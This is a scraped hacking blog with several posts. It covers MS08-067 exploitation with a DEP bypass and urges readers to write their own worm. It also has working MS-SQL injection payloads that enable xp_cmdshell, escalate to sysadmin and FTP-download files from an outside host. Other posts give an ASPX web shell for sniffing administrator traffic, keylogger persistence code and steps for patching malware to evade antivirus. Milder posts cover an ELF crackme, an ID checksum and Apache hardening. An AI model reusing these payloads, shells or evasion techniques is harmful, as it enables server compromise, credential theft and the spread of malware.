another talk about MS08-067

hi again

i,m sure you know about this ciritical / wormable  vulnerability  . immediate after releasing vulnerability Win32.Gimmiv worm released too . this worm use this vulnerability and will run after first execute as a windows service . but i,m sure this worm is not last worm based on this vulnerability .

this vulnerability specifically exists on Server Service Remote Procedure Call (RPC) handling, where an attacker could perform a stacked-based buffer overflow by sending a request to a vulnerable function, “NetPathCanonicalize()”. In this way an attacker may escalate privileges, using the named pipe “\\pipe\srvsvc” to access other machines over the network via the pipe’s file sharing service.

exploiting this vulnerability On win 2k and XP SP1 Sp2 and Sp3  is really fun just rpc requset to based on 4b324fc8-1670-01d3-1278-5a47bf6ee188 to getting reliable eip and code executing . in windows xp sp1 and 2k and of course windows xp sp2 and sp3 with no dep you need just a jmp or call esi or edi register for code executing .

and about windows xp sp2 and sp3 with dep :

you can use address of NtSetInformationProcess call  in ACGENRAL.DLL for disable DEP  of course you need Scratch ( read/write static memory location) and you can find that in ACCGENRAL.dll too .

hd moore independent security researcher used this method for executing shellcode . in windows xp sp3 you can use this method  (using pre-process disable in ACCGENRAL.dll ) (of course with differing address of calling NtSetInformationProcess()) .

from hdm :

The actual function we use to disable NX looks like this:

push    4
lea     eax, [ebp+arg_0]
push    eax
push    22h
push    0FFFFFFFFh
mov     [ebp+arg_0], 2
call    ds:[email protected]
i wrote my own reliable exploit and maybe in future i public that for all

and about GIMMIV  worm :

full discussion :

The executable “WinbaseInst.exe” is the worm component you can see  worm service after executing binary following this picture :

you can be sure this worm use this vulnerability from founded UUID in basesvc.dll in %SystemRoot%\system32\wbem

after worm scanned and found vulnerable system using 4b324fc8-1670-01d3-1278-5a47bf6ee188 worm run download and execute shellcode following this picture :

this worm use random number and random server for downloading files . i,m sure this worm  have different compiled version (for leaked servers and AV’s ) . maybe in another post i discuss about this worm completely.

you can read full post about reversing ms08-067 patch here :

next post will be patch analysis part 1

for now test your skills for write your own worm with this vulnerability .

best regards and have nice hacking

Iranian National Code Algorithm

hello again .

i think this post must be interesting for iranian peoples . this theme is completely ripped from my  friend soroush dalili weblog finally don’t forgot this post and algorithm was published for educational purposes only so author is not held responsible , used for any other purposes than the one stated above.

Melli card & code

Melli card & code

Each person in Iran has a national code which is called “Code Melli”. And, its algorithm is very similar to ISBN algorithm:

The rules are:

1-  This number has 10 digits like: C[1] C[2] C[3] C[4] C[5] C[6] C[7] C[8] C[9] C[10]

2-  3 digits of left must not be equal to 000 (c[1]c[2]c[3]000)

3-  C[10] is a control digit (like ISBN algorithm)

The formula to determine C[10] is:

Let A = (C[1]*10)+ (C[2]*9)+ (C[3]*8)+ (C[4]*7)+ (C[5]*6)+ (C[6]*5)+ (C[7]*4)+ (C[8]*3)+ (C[9]*2)

Let B = A MOD 11

If B == 0 Then C[10]=B Else C[10] = 11-B

This JavaScript function is useful to validation:

//—————Start of Iranian national code checker function—————


//Written by Soroush Dalili – October 2008


function IsIRNationalCode(theNum)




return false;




if(theNum.substr(0,3)==’000′) return false;

var check = 0;

for(var i=0;i


var num = theNum.substr(i,1);

check += num*(10-i)




return false;




return true;




//—————End of Iranian national code checker function—————



good luck and have fun

ELF Reversing , Beginner


Again it’s me , MrXX
Like what I was to say in this post I going to talk about sample ELF Reversing

I don’t know how many people talk about this later but this tut was some of the strange & maybe new to learn ( I was see many of cracking team just working on the windows , because Linux is free , he but all the OS need some time’s to do some cracking )

All the words you will read is going from author : MrXX ( like pervious post )
Ok let’s started

First think we need some tools
We use these tools for making are way easier
1-Some Program for Crack
2-the GUI Debugger
3-Hex Editor
4-some knowledge about the ASM , Cracking

Ok the first think : Some PJ for Crack

Source Code

Complied Project

Cracked Pj

I was write sample Crack Me for this part
The crack me is open source : he he


int password=123456;
int inputpass;

printf(“Please Enter a Password to continue > “);
scanf(” %d”,&inputpass);

if ( inputpass == password ){
printf(“\nWelcome u will able to access the Tool\n”);
printf(“\nU able Reverse the linux elf file \n”);
printf(“\nKeep Good job    \n”);
printf(“\nBAD Password\n”);


You will available to see in the code , we got the IF statement that was check to value
First the pass is = 123456 ok
If pass = user input show the good message or if not show the bad message
Ok I compile it before and executed and see the message
Please Enter a Password to continue > 123
I enter a wrong code and see the bad message

Bad Message

Bad Message

Know how can I able to see the Good message
Let’s start some reversing
2 – I need the GUI debugger ( why ? because many time I use the windows debugger like olly or ida and know I addict to use the gui )
Ok it isn’t problem ( but don’t be lazy like me , u must use the command line debugger like : many …. )
I going and get the  Zero Debugger from address
( this is one of the Linux app need to be Cracked | and I release the path for this later )
I startup my Ubuntu Linux ( because I use the Ubuntu version of zero debugger )
And after I install Zero Debugger ( need some pack to be installed ) and run the debugger
From zero debugger I go under File > Execute menu and  open my ELF file and I see the disassemble face of the ELF



I scroll done some line and see the CMP ( Compare ) and in the line under I see the JNZ statement , yeah look good ( 4-this is the way u need some knowledge about the ASM , Cracking )
I wrote done the line , 08048406 75 52   jnz 0x804845a
This is cool for the first Crack me , we don’t need to get to the line and see what’s inside , because the crack me is sample

3- know I need to edit the line and change the 75 52 hex to 74 52
Ok I start the hexedit program



And go to the 00000400 line , find the 406 hex code ( remember the 08048406 ) and change the 75 to 74
I save the file into crackme cracked and executed again
I enter a wrong code again and see , yeah the good message

Good Message

Good Message

We able to Reverse the ELF file
This is it , all routine was sample
But don’t be happy , because when the code getting bigger you will got the bad problem ( why ? because there is no olly or ida or sample code to reverse )
And u must do with command line and many line of code

In the next step we going to crack be bigger crack me : called CrackMe2 using Function
Good luck

Ms-Sql Injection Privilege Escalation !

Hi God .

Hi Again My Readers!
[Attention ] : I  Break Long command .
1- In mssql , when your Privilege Is USER or Db_Owner You will can Enable XP_DIRTREE And Dir wanted Drive .


After Enable , You Can Execute Xp_dirtree and save Result In Database & view It.

2- Enable Execute in Administrator Privilege Without Execute Permission :

Enable XP_EXC:

+’show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

Enable OS_EX

viewdetail.aspx?test=22′;exec sp_configure ‘show advanced options’,1;RECONFIGURE;
exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE;

After Execute :

viewdetail.aspx?test=22′;EXEC xp_cmdshell ‘ping′ ;

3- Back UP From Database :

viewdetail.aspx?test=22”+BACKUP database master to disk=’d:\Inetpub\wwwroot\’;–


/FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysusers’
exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set sid=0×01,roles=0×01 where name=”guest”’,'xx’ exec sp_executesql N’drop view dbo.test’–


FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysxlogins’ exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set xstatus=18 where name=”BUILTIN\ADMINISTRATORS”’,'xx’ exec sp_executesql N’drop view dbo.test’–

and then :

FullStory.asp?id=1;exec master..sp_addsrvrolemember ‘nhaxinh’,sysadmin –


FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–

6- Open Remote Link :

/FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–


/FullStory.asp?id=1;select * from openrowset(‘sqloledb’, ‘server=UNESCO;uid=BUILTIN\Administrators;pwd=’,'set fmtonly off select 1 exec master..xp_cmdshell “echo open a.b.c.d >f & echo user a a >>f & echo bin >>f & echo cd a >>f & echo mget * >>f & echo quit >>f & ftp -v -i -n -s:f” & del f’)– (> == “>”)


echo open a.b.c.d >f

echo user a a >>f

echo bin >> f

echo cd a >>f

echo mget * >>f

echo quit >>f

ftp -v -i -n -s:f

del f

Another Way? !

You Can use PANGOLIN , it is good Sql injector with bypass some Protection :

Download :

Enjoy .

Daphne .

Is your Apache in safe mode ?

This Post is a bit review to Apache security and not contain all details but i want write all of them.

When you decide to build a web server based on Open source Os for all web publishing -public or private- all the futures not needed . But sometimes some of them mus tow change carefully. We have to case of Apache using here :

Case 1 : In some cases you need to build a simulated ftp server based on HTTP protocol.

Case 2 : You need to build a MAIL server with HTTP interface. Such as HORD or SQURRIER MAIL.

SO what changes needed ?what kind of futures are usable here for Your jobs ?.

In default installation of Apache -as so useful web server – in a big range of open source operating systems you may see auto indexing and directory browsing , its good for HTTP server as FTP server but is it usable as HTTP-mail server ? Of curse response is NO .Why ? Its so simple .In case 1 you just need to give the permission to your users for reading files and browsing directories JUST!.And denied them to reading or browsing other directories . In case 2 the server design may have a complete configuration with case 1 .Here You must use an interpreter for your scripts and language .So is your directory browsing options may not denied is it possible ?.In example an attacker can change his directory to upper or can see most important data such as web server configurations and – or – some log files or a high level script kiddie could copy you password to anywhere .Now your web server is really crackable and an attacker can read your configurations and may change THEM !!. What did you do ? its so good question .

1- You can change permission of all unneeded directories to deny for other users and groups like :

“[[email protected]] # chmod -R 700 some directory that you want to hidden from other ”

2- Change the permission of your files to only readable for www and not executable – if you want to use HTML pages – and for script based pages

do “[[email protected]]# 644 *.php or other scripts
3- If your server pages is PHP you can change a bit the php.ini file

its in my machine :

[[email protected] /usr/home/t4z3v4r3d]# cat /usr/local/etc/php.ini | grep basedir
; open_basedir, if set, limits all file operations to the defined directory
open_basedir = /usr/local/www
[[email protected] /usr/home/t4z3v4r3d]#

open_basedir = /usr/local/www to the your www directory this is he way of blocking of some php-shell scripts lik c99.php.

what the php shells cand do ?

what the php shells cand do ?

Hi this is 2′nd part of Apache security .
We want to look how to safe all of our scripts when we have some sites.
In share servers – commercial servers – we can secure our serer by some applications such as Cpanel Plesk or etc.
But how can we secure it by hand ?.Of curse its not so simple but its not hard to do.
Ok lets to see what we can do ?.Let look to this how to from an attacker.
Any of attacker want to get some information to doing a successful attack to any server.
But what is information exactly ?yes any information its correct !,all information may help the attacker to entering in to your server .
What kind of web server , web server version , Os version and type,mod ‘s of your web server is running  , server admin’s mail , dns-server , and …. is a good information to starting an attack.

some of the information can’t be hidden but some of may hidden !!!.
Ok we can change our server’s operating system name , web server name and type and version by some tools and mods – soon – .

All attacks methods are depend  to security of your server .

Ok we have some changes in our apache configuration.
But is it enough?. At the same way :what is the set of security settings for
Apache?.Security is a complex of invisible or bit notes.You can’t deny web viewers to looking your web contents in a little range of time .-in fact you can’t tell to users : Do brows my web contents only one time – but you can denied them to browsing all site in a little range of time  – or attacking such as directory traversal attacks or denial of service attack – .This attack can give a large amount of server resources .you can detect this attack and ban the attacker . Apache developed by some modules now, we can select our needed modules for protection.
Modules may be a helpful tools if you have enough information about how to work this module .Apache have 3 release version : 1.3.X and 2.0.X and 2.X all of this versions can using some modules.
For any platforms that you want to work on it may you need to some changes in configurations and giving resources to web server or changing in firewall rules and etc … . But you are module selector and you are lord of Apache world .Deciding which modules are needed is your job and tuning Apache is your art .
Its end of section one for now because I have no time to continue . i’ll be back very soon – iwant build a http server on my bsd box all of notes are really -In the next section we look for details .

internet explorer 8 XSS filter bypassing

IE8 is a new Microsoft browser, the integrity of its CSS2.1 support, HTML5 support,
built-in development tools and so on. IE8 in the browser security on a very big improvement, not a
built-in unloading the Xss Filter, non-durable type of cross-site scripting attacks do a relatively good
protection. However, 80 sec in the test IE8 found, IE8 the Xss Filter there are Vuln, resulting
in some version of the eastern countries simply can not stop the URL Xss for example,
in the Persian version, use some simple data can Bypass Filter out the strategy IE8.

Vulnerability analysis: As IE8 Xss Filter in the filter to take the coding system is built-in encoding,
in the Persian version will be gb2312, in some other Eastern countries will adopt the appropriate wide-byte coding.
Submitted a non-coding sequences such as% c1 <will be IE8 as a normal character for the East Filter keyword matching,
and in the pages displayed, because of their pages will be designated a UTF-8 encoding for example, in the analytical
time % c1 <is not a valid UTF8 encoding, this will be treated as two characters,resulting in a <bypass the check, this inconsistency has led to the formation of Vuln.
Vuln that: assume that there are web script:

header("Content-Type: text/html; charset=utf-8");
echo $_GET[c];

In the east of the country IE8 system, if the conduct of conventional XSS such as:


IE8 security strategy will be to stop, but if the
The code can bypass the ie8 xss filter and implementation.

vulnerability state: this vulnerability reported to microsoft (by chinese hacker ) and is awaiting a response.

bug in winpcap


I feel God Is here .

Hi dear , I’M Daphne , My job is Penetration Tester (Pen-Tester) , I write About This Subject and Around  .

Pent-Test is Cool & funny job with hacking interesting subject.

anyway ….

I use winpcap 4.2(last version)

what is winpcap :

WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.

WinPcap consists of a driver, that extends the operating system to provide low-level network access, and a library that is used to easily access the low-level network layers. This library also contains the Windows version of the well known libpcap Unix API.

How to load winpcap in windows :


when Administrator or Other Power users in windows summon winpcap driver (such as wireshake or nmap or cain or …) driver loaded !

but , when close program , winpcap driver still in memory , That’s it .

when driver not unload , Guest user or IIS_User can load this driver in kernel level , and SNNIFF Admin Packet in administrator Level or get  Administrator privilege .

I sniff packet with win dump in guest mod .

Ok , I write This little tools for iis7 – iis6 in windows 2003 – 2008 :

usage :

load wireshake or other tool that run winpcap driver .

rename windump.exe to packet.exe and upload near winpcap.aspx and run it .

and then you can sniffed packed in 1.txt /


<%@ Page Language=”VB” Debug=”true” %>
<%@ import Namespace=”system.IO” %>
<%@ import Namespace=”System.Diagnostics” %>
<script runat=”server”>
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
‘ Change Path Of tcpdump
Dim myProcessStartInfo As New ProcessStartInfo(Server.MapPath(”packet.exe”))
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
result.text= vbcrlf & “<pre>” & mystring & “</pre>”
End Sub</script>
<form runat=”server”>
New Method Of Packet Sniffing In web whith Public Accesss .
<br />
This Program Run is AS IS !
<strong><span class=”style-2″>Serve rip</span></strong> :<span class=”style-2″>  <%=request.ServerVariables(”LOCAL_ADDR”)%></span><br>
<strong><span class=”style-2″>Machine Name</span></strong> :<span class=”style-2″> <%=Environment.MachineName%></span><br>
<strong><span class=”style-2″>Network Name</span></strong> :<span class=”style-2″> <%=Environment.UserDomainName.ToString()%></span><br>
<strong><span class=”style-2″>User Name</span></strong> :<span class=”style-2″> <%=Environment.UserName%></span> <br>
<strong><span class=”style-2″>OS Version</span></strong> :<span class=”style-2″> <%=Environment.OSVersion.ToString()%></span><br>
<strong><span class=”style-2″>IIS Version</span></strong> :<span class=”style-2″> <%=request.ServerVariables(”SERVER_SOFTWARE”)%></span><br>
<strong><span class=”style-2″>HTTPS</span></strong> <span class=”style-2″>: <%=request.ServerVariables(”HTTPS”)%></span><br>
<br />
Tested On Windows vista , IIS7 .
<br />
<h5>Discover By “DAPHNE IDEA SECURITY ” .</h5>
<br />
Exp: -i 6 -w “c:\windows\temp\packet.txt”
<hr />
<asp:Label id=”L_p” style=”COLOR: #0000ff” runat=”server” width=”80px”>TCP DUMP PATH:</asp:Label>
<br />
<br />
<asp:Label id=”L_a” style=”COLOR: #0000ff” runat=”server” width=”80px”>Arguments</asp:Label>
<asp:TextBox id=”xcmd” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid” runat=”server” Width=”300px”>-D</asp:TextBox>
<br />
<br />
<asp:Button id=”Button” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #000000″ onclick=”runcmd” runat=”server” Width=”100px” Text=”DUMP PAcket”></asp:Button>
<asp:Label id=”result” style=”COLOR: #0000ff” runat=”server”></asp:Label>

this tools is sample .

in future i speak about how to Privilege escalation with kartoffell tools in drivers .;)

undetect malwares , virues from anti-virues

In the name of god
Hi, I’m MrXX and in this blog I want to talk about the some coding, reversing and more…

And please don’t post the some shit comment in the index, because we going to delete it
And please don’t spam us with Noob question, cause they don’t answer the Noob
And the last think sorry about the English, cause I can’t even talk in English (I just can read) by the way

In the first, I want to talk about some reversing (I tired and seek and my mind wasn’t work correctly)
This is not my tut by I search over the web 2 or 3 day to find the best way & I think this is best way (original tut by : Kenny)

To undetected the malware from antivirus

First we need tools
1-Hex editor: I use the HIEW (not the 32 bit ver)
2-PE Tools: I use the PE Tools v1.5
4-Cracker call this BRAIN (I think I got it by I can’t give it to u, go find yours)  :)
If u don’t know what is those tools and how u can use it: I tell u go f.u.c.k yourself and please don’t read this
Ok , I read the magic world and dorooooororooooooo : oh my god magic happen :) , my malware undetected , ha ha ha ha I’m kidding there is no magic & magic is just some shit , every think in this whole world have the logical reason (I don’t believe magic)
Make malware (Trojan,rootkit,virus,…) undetected just have some little ways and if u like it I tell all the possible way to make our malware tools undetected ,but I tell it 1 by 1 , and if I see some , kididi mididi tnx in the comment I tell the next magic world
Let’s pull the chair close to your PC and get started
I wrote my own keylogger many year ago , but god DAMN antivirus known my own private keylogger as the probably unknown NewHeur_PE virus

And nod want to submit this to them Database :(

Oh my god how could this happen :) , don’t worry about that I tell u next time how u can bypass the stupid antivirus with some cryptography
In this time I want to undetected the binary file (u can use this to make all the binary malware u don’t have them source)
See the virustotal result: that’s nasty

And u will see, some of antivirus detect the malware and some of them don’t detected because is this private
Malware detected because of some of the line like:

Dim ModuleName As String, FileName As String, hInst As Long
ModuleName = String$(128, Chr$(0))
hInst = GetWindowWord(Me.hwnd, GWW_HINSTANCE)
ModuleName = Left$(ModuleName, GetModuleFileName(hInst, ModuleName, Len(ModuleName)))

If CheckPath(SystemDir + “svchost.exe”) = False Then
FileCopy ModuleName, SystemDir + “svchost.exe”
ShellExecute Me.hwnd, “open”, SystemDir + “svchost.exe”, vbNullString, vbNullString, SW_HIDE
End If

Because the uses of those api

Private Declare Function SetWindowsHookEx Lib “user32″ Alias “SetWindowsHookExA” (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib “user32″ (ByVal hHook As Long) As Long

Ok later we crypt those command and use the API very cleverly to bypass the Noob antivirus
Oh we talk some much let’s back to the undetected part
First we pack the file with UPX (do something else) and we open our packed file with the PE Tools

Open file and get some info about the entrypoint

Entry Point: 0000AD20
Image Base: 00400000

Now we open the packed file with HIEW in the disassemble mode we going to entry point
U will see some entry like this

This is the entry that was UPX make
When we scroll done some line we will see zero space, we use this for hexing our tool
Place those codes into the zero space
Use the edit F3/F2 command

push        00040AD20   <— push OEP
push        eax
pushfd                   <—for tricking AVP
pushad                    <—for tricking AVP
call       .000025154  <—– call for Ret 28h
retn 00028

The address depend on your system and those are not the static

After that , save the progress
And again add 2 line

INC ECX  <— Counter up
Loop 000022D9

Save them again
Ok our hexing finish , now we must go and change our entry point to the new entry
We open the PE Tools again change the entry point to the new value

OEP = entry address – imagebase(400000)

New entry:0040AED9

After that we unpack the file with UPX an it must be undetected from AV
This method called: changing the entry point for undetected the malware
That’s the nice way but we got the easy way to like Pack the file , hexing the Signature of the file and  …

In the next post I talk about ElF File’s And Reversing
Good Luck

bypass antivirus with string crypting

yeah , as i say in the last post

in this tut you will learn to bypass some of the sutpid god DAMN antivirus with string Encrypt/Decrypt trick

DL Link

the next post will be : Undetect the malware from AV

another start

here is another info-sec blog via some security researchers we are really busy in these days in our small labs  but we hope can have efficiency result and update this blog with some interesting content . we are trying update this blog everyday and finally we accept all of your discretion and comments .



Get Adobe Flash playerPlugin by wordpress themes